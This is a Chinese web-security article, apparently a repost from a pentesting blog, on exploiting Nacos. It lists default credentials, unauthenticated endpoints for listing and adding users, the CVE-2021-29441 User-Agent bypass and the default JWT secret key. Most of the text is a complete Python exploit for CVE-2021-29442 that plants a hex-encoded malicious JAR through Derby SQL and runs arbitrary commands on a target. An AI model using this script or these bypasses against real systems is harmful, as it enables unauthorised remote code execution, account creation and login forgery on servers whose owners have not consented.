【web安全】Nacos常见漏洞分享

admin 2025-12-27 02:00:03 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文总结了Nacos常见漏洞,包括默认口令、未授权访问、CVE-2021-29441User-Agent绕过、默认JWT密钥伪造及CVE-2021-29442Derby数据库RCE。文章提供了成因分析与利用POC,建议渗透测试时重点检查鉴权配置并修补漏洞,防范内网横向移动风险。 综合评分: 92 文章分类: 渗透测试,漏洞分析,WEB安全,内网渗透,漏洞POC


cover_image

【web安全】Nacos常见漏洞分享

h4ppy

安全驾驶舱

2025年12月26日 10:53 陕西

前言

Nacos是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

在进行渗透测试时,往往能遇到很多Nacos,尤其内网,本文总结了几种常见的Nacos漏洞及利用方法。

TIPS 知识补充

PART.1

默认口令

账号:nacos

密码:nacos

PART.2

默认配置导致未授权访问

01**

漏洞成因:未开启鉴权nacos.core.auth.enabled = false

02

漏洞利用:

与CVE-2021-29441不同,无需在header中添加UA即可利用

1、查看用户信息

http://[ip]:[port]/nacos/v1/auth/users?pageNo=1&pageSize=1

2、添加用户

http://[ip]:[port]/nacos/v1/auth/users

POST username=test1&password=test1

PART.3

CVE-2021-29441

01**

漏洞成因:

与默认配置未授权访问不同,此为User-Agent绕过鉴权的bypass

02

漏洞利用:

Header中没有添加user-agent:Nacos-Server时报错

Header中添加user-agent绕过鉴权,如下:

1、查看用户信息

2、添加用户

PART.4

默认jwt密钥

01**

漏洞成因:

未修改nacos.core.auth.default.token.secret.key,默认的key如下:

SecretKey012345678901234567890123456789012345678901234567890123456789

02

漏洞利用:

通过网站https://www.jwt.io/,填入jwt key,修改exp时间戳与sub用户名,可生成jwt:

拦截登录的响应数据包,作如下修改:

即可成功登录:

PART.5

CVE-2021-29442

01**

漏洞成因:

nacos带有一个嵌入式的小型数据库derby,而在版本<=1.4.0的默认配置部署nacos的情况下,它无需认证即可被访问,并执行任意sql查询,导致敏感信息泄露,在结合removal接口即可执行命令。

02

漏洞利用:

POC如下:

import&nbsp;randomimport&nbsp;sysimport&nbsp;requestsfrom&nbsp;urllib.parse&nbsp;import&nbsp;urljoinimport&nbsp;argparsedef&nbsp;exploit(target, command): &nbsp;&nbsp; &nbsp; removal_url = urljoin(target,&nbsp;'/nacos/v1/cs/ops/data/removal')&nbsp; &nbsp; derby_url = urljoin(target,&nbsp;'/nacos/v1/cs/ops/derby')&nbsp; &nbsp; hex_jar =&nbsp;'504b03040a000008000033b9f058000000000000000000000000090000004d4554412d494e462f504b030414000008080033b9f058fcfe28795000000051000000140000004d4554412d494e462f4d414e49464553542e4d46f34dcccb4c4b2d2ed10d4b2d2acecccfb35230d433e0e5722e4a4d2c494dd175aab452f04d2c4bcd53f0720c5208c8294dcfcc5330d63306a9712acdcc49d1f54ac9d60d2e484d066a34e4e5e2e50200504b03040a0000080000cfaaef5800000000000000000000000004000000636f6d2f504b03040a000008000097b0f0580000000000000000000000000c000000636f6d2f747267616e64612f504b03040a000008000033b9f0580000000000000000000000000f0000004d4554412d494e462f6d6176656e2f504b03040a000008000033b9f0580000000000000000000000001b0000004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f504b03040a000008000033b9f058000000000000000000000000230000004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f726567656f72672f504b030414000008080033b9f0589475fc2c7b040000720800000a000000457865632e636c6173738d555b535b5514fe4e48b20f87700b0448e90d6bdb700958b55a435b2d6d6ab1e162a060506b4f4e4ee04048e2c909975ab53ae38ce33ff0c5195fe4b5be848eccf8d8077f8ccf3e15bf7d02210c716c26b3f75e6b7dfb5b6bafb5d7d97fbdfce34f006fe37b0daf6352e0230d1e4caab8af22a1610ad32a6634dcc1ac8a8f3524312787790d713c1058d0d08a45814f34b423258725b9fd5381cf043ed7d02d191f6ae8c1171abaf0486a7429ea02690143c369e92b2367531ab37295951c598165811505feeb56de726e2a688a0c2e28f0de2e644c05ed092b6f4e97d7d3a63dafa773d404130543cf2de8b625e503a5d759b14ae448c4b74c639cb2c959c1a5486255dfd0c7727a7e796cceb1adfcf2f8e049950261ace876c974247d03b3bf509ad6d7e947292ae8aa43ccda05c32c950869caca0042559b55189bcc17cb0e094c7d5d5aad92ada0bf913569ea19d326c69326a4af06992867b3a66d666a766f8ea9602c9bb6e59884f6d4a0d538175dbd3c4c91a20b390a6756aa6a08c5acd9dc63c4b70cb3e85885bc0cd558cfc860b2b560ea72510d8aa8d6394737d6a6f4a25b00014b6055604d81365728db8679d792656996e5189524015cc425c6dc985081afec64a3d7187ba1349a67aa057201ac234acda295cf14364b01e4516078cbe9358162005fc20e6004d43b282b08ff676aa5eb8d43d727122bad9b016c613b80c7f88ae56d901605dd8d727d083e9e5fc9f82480aff14d00dfca43d7409333758cbd275361e53292d41f4f2667923119cfd300bec3366b1f77ef73c7d19e99f4aa6938c754551a059d27ee677d0c47e939be79bbe49854b52c9b0e77154ddba15fade4e8b6535ab41c7668a851372d1df3972ce71d4b368a469a9a108ad437dd819a97e8f2ffb4e75177b591ee58e4bd8794275a6d28d2d0d0c013bf325d47e0833e935a953b3209b7dbba230dbf177ebd5834f3ec939157fac2d4daa6cedf41334a7fed6ec3ba1d356feb06ddf6451a76ae04fb8c5ca14448f4153dbb978aae55a75055610017f806c89f078aec4b8e97298d715638fb8676a1fcee9a231cfdae52c520c7401580210c736e66ff45ab9b3d7e782903bfedc193da455322e89d0afa9ec33f1d7d81f6685054a0fe0c7fb079ea39b4a10a5a62deb0b78240ccb787d654d837b28bb6987f0feda9b07f171d31a1c4d4303775a662ea0bb40e87d50a828b3bfb7fefe0d6d41ebae92334bd879e547417bd31ef8824eb8b5610968b533bf049e2d3449d099eade01c2de7395530f06cb882d79ef16c2a1ec1e06bf5043fe047f4a3c93ded125f2da085d6568e6de8e46377161d4c5a90a7eec215be5e3710c23de2eea3170be823cf45329d42862c393e6c1b3843d673788af3e41ec04f4cf7af4cb3cce063e6b0050f30ca747bc83e8337b86a22f73be47e9359bc42f92dbed43efab980abd4fbe9ad0fefe21a047d86f01e112a3d5d450ce3dcbbc16a5c27dacb086ee026de27332b810f889395fb05b730c13adda6f410e22506043c0277f8df6750cdeef240211017b82bd02ad04e11d8e781ab36924e0874edf334bec32d5d02dd82a95004fa957fe4021fba37e7debf504b030414000008080058aaef5840b75f2d53010000eb0200002a0000004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f726567656f72672f706f6d2e786d6c8d91cd6ec2301084ef3c45947bec507a40c8b5d443ab56828204ad7a35f636982676643b84be7d6d879fe440d55b76f6db9df186d446ef81bbe45895ca3ea43be7ea19c6153b8042ac667c07489b02af960b7c8f7294a71d393b5a79a1dbb645ed247277793ec69f8bf9da0f562c93ca3aa638a4a324f113331be5b9e6cc49adfe6197dc228e5674621639e4eb947a17526901e50718eb0d68ec113cd046812a8c6eea5741b9ae9033055382117c1603c08c935f8c3b5f1a28c05b12dcd30272382d1ca33c5bbf3daed62fcb0dc16735103eee372ba42ae89e1982af65cca05805d7e5b10a72634a7ae3d50487661cf6ffad069f076c18ea84f023d1b691a540563786c393e25a04bff7cd7336f501fe62c256dc5f1b04013528018a5f8d2ed24f27f4aeb96f9474833bc676ef6e276278c9089def364153341e9c31b62df7c1a803eba7bbef2e0d1ec6e9d531f1e5cd74f40b504b0304140000080800ca82f0586a0b6b6f3c0000003c000000310000004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f726567656f72672f706f6d2e70726f706572746965734b2c2ac94c4b4c2ef14cb12d4a4d4fcd2f4ae74a2fca2f2d00f293f373f54a8ad213f35212b9ca528b8a33f3f36c0df50c7483fd1c03823dfc43b800504b010214030a000008000033b9f058000000000000000000000000090000000000000000001000ed41000000004d4554412d494e462f504b0102140314000008080033b9f058fcfe28795000000051000000140000000000000000000000a481270000004d4554412d494e462f4d414e49464553542e4d46504b010214030a0000080000cfaaef58000000000000000000000000040000000000000000001000ed41a9000000636f6d2f504b010214030a000008000097b0f0580000000000000000000000000c0000000000000000001000ed41cb000000636f6d2f747267616e64612f504b010214030a000008000033b9f0580000000000000000000000000f0000000000000000001000ed41f50000004d4554412d494e462f6d6176656e2f504b010214030a000008000033b9f0580000000000000000000000001b0000000000000000001000ed41220100004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f504b010214030a000008000033b9f058000000000000000000000000230000000000000000001000ed415b0100004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f726567656f72672f504b0102140314000008080033b9f0589475fc2c7b040000720800000a0000000000000000000000a4819c010000457865632e636c617373504b0102140314000008080058aaef5840b75f2d53010000eb0200002a0000000000000000000000a4813f0600004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f726567656f72672f706f6d2e786d6c504b01021403140000080800ca82f0586a0b6b6f3c0000003c000000310000000000000000000000a481da0700004d4554412d494e462f6d6176656e2f636f6d2e747267616e64612f726567656f72672f706f6d2e70726f70657274696573504b0506000000000a000a00ab020000650800000000'&nbsp; &nbsp; headers = {&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;"User-Agent":&nbsp;"Nacos-Server"&nbsp; &nbsp; }&nbsp; &nbsp;&nbsp;for&nbsp;i&nbsp;in&nbsp;range(0, sys.maxsize):&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;id&nbsp;=&nbsp;''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',&nbsp;8))&nbsp; &nbsp; &nbsp; &nbsp; post_sql =&nbsp;f"""CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(X''{hex_jar}'' as blob)', '/tmp/{id}', ',', '"', 'UTF-8', '/tmp/{id}.jar')CALL sqlj.install_jar('/tmp/{id}.jar', 'NACOS.{id}', 0)CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'NACOS.{id}')CREATE FUNCTION S_EXAMPLE_{id}( PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'Exec.exec'"""&nbsp; &nbsp; &nbsp; &nbsp; get_sql =&nbsp;f"SELECT * FROM (SELECT COUNT(*) AS b, S_EXAMPLE_{id}('{command}') AS a FROM config_info) tmp"&nbsp; &nbsp; &nbsp; &nbsp; files = {'file': post_sql}&nbsp; &nbsp; &nbsp; &nbsp; post_resp = requests.post(url=removal_url, files=files, headers=headers)&nbsp; &nbsp; &nbsp; &nbsp; post_json = post_resp.json()&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;post_json.get('message',&nbsp;None)&nbsp;is&nbsp;None&nbsp;and&nbsp;post_json.get('data',&nbsp;None)&nbsp;is&nbsp;not&nbsp;None:&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(post_resp.text)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; get_resp = requests.get(url=derby_url, params={'sql': get_sql})&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print(get_resp.text)&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;breakdef&nbsp;main():&nbsp; &nbsp; parser = argparse.ArgumentParser(description='Exploit script for Nacos CVE-2021-29442')&nbsp; &nbsp; parser.add_argument('-t',&nbsp;'--target', required=True,&nbsp;help='Target URL')&nbsp; &nbsp; parser.add_argument('-c',&nbsp;'--command', required=True,&nbsp;help='Command to execute')&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; args = parser.parse_args()&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; exploit(args.target, args.command)if&nbsp;__name__ ==&nbsp;'__main__':&nbsp; &nbsp; main()

攻击成功:

END


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:安全驾驶舱 h4ppy《【web安全】Nacos常见漏洞分享》

评论:0   参与:  2